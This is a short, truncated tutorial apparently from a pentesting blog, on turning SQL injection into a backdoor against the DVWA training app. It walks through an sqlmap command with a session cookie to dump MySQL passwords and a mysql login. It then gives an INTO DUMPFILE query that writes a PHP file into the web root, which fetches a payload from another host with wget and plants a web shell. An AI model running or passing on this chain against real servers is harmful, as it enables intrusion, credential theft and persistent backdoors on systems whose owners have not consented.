Create Backdoor From Sql Injection
To create backdoor from sql injection, the web must be vulnerable with sql injection. then we find the password for mysql database, that can be do with some tecnique, like social enginering or scanning with sqlmap, for exemple : root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="Cookie: security=high; PHPSESSID=5c0eecdbcf2a5acdee16c2b389be67e4" --password after we got the password, now we enter to mysql with the following sintax: root@bt:/pentest/database/sqlmap# mysql -h [host ip] -u root -p then press enter and input the password we got. now we on my sql shell, and from here we can create database and create backdoor. this sample sintax to download backdoor from other web : mysql> select "<? system('wget 192.168.56.1/cn.txt -O bar.php'); ?>" into dumpfile '/opt/lampp/htdocs/dvwa/bad.php' --; Query OK, 1 row affected (0.00 sec) now we ...